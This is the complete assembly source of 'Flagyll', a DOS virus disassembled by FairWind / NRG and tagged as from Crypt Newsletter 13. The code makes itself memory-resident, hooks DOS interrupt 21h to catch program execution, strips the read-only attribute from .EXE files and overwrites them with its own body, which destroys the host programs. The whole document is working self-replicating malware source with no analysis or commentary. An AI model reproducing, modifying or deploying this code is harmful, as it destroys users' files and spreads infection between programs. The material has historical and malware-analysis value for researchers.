FLAGYLL
;
--------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
;
--------------------------------------------------------------------------
.radix 16
cseg segment
model small
assume cs:cseg, ds:cseg, es:cseg
org 100h
oi21 equ endflagyll
filelength equ endflagyll - begin
nameptr equ endflagyll+4
DTA equ endflagyll+8
begin: jmp install_flagyll
install_flagyll:
mov ax,cs
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5a
jne cancel
mov ax,ds:[0003]
sub ax,100
mov ds:0003,ax
copy_flagyll:
mov bx,ax
mov ax,es
add ax,bx
mov es,ax
mov cx,offset endflagyll - begin
mov ax,ds
inc ax
mov ds,ax
lea si,ds:[begin]
lea di,es:0100
rep movsb
hook_21:
mov ds,cx
mov si,0084h ;
mov di,offset oi21
mov dx,offset check_exec
lodsw
cmp ax,dx ;
je cancel
stosw
movsw
push es
pop ds
mov ax,2521h
int 21h
cancel: ret
check_exec: ;
pushf
push es
push ds
push ax
push bx
push dx
cmp ax,04B00h
; executed ?
jne abort
do_infect:
call infect
abort:
pop dx
pop bx
pop ax
pop ds
pop es
popf
exit:
jmp dword ptr cs:[oi21]
infect:
jmp over_id
note: db '-=[Crypt Newsletter 13]=-'
over_id:
mov cs:[name_seg],ds
mov cs:[name_off],dx
; the name of the file
cld ; clear direction flags
mov word ptr cs:[nameptr],dx
mov word ptr cs:[nameptr+2],ds
mov ah,2Fh
int 21h
push es
push bx
push cs
pop ds
mov dx,offset DTA
mov ah,1Ah
int 21h
call host_ident
push di
mov si,offset COM_txt
mov cx,3
rep cmpsb
pop di
jz return
mov si,offset EXE_txt
nop
mov cl,3
rep cmpsb
jnz return
do_exe:
mov ax,4300h
mov ds,cs:[name_seg]
mov dx,cs:[name_off]
int 21h
and cl,0FEh
mov ax,4301h
int 21h
mov ds,cs:[name_seg]
mov dx,cs:[name_off]
mov ax,3D02h
int 21h
jc close_file
push cs
pop ds
mov [handle],ax
mov bx,ax
push cs
pop ds
mov ax,4200h
push cs
pop ds
mov bx,[handle]
xor cx,cx
xor dx,dx
int 21h
mov ah,40
mov cx,filelength
mov dx,100
int 21h
close_file: mov bx,[handle]
mov ah,03Eh
int 21h
mov ax,4C00h
int 21h
return: mov ah,1Ah
pop dx
pop ds
int 21H
ret
host_ident: les di,dword ptr cs:[nameptr]
mov ch,0FFh
mov al,0
repnz scasb
sub di,4
ret
EXE_txt db 'EXE',0
COM_txt db 'COM',0
name_seg dw ?
name_off dw ?
handle dw ?
note2: db 'Flagyll'
endflagyll:
cseg ends
end begin
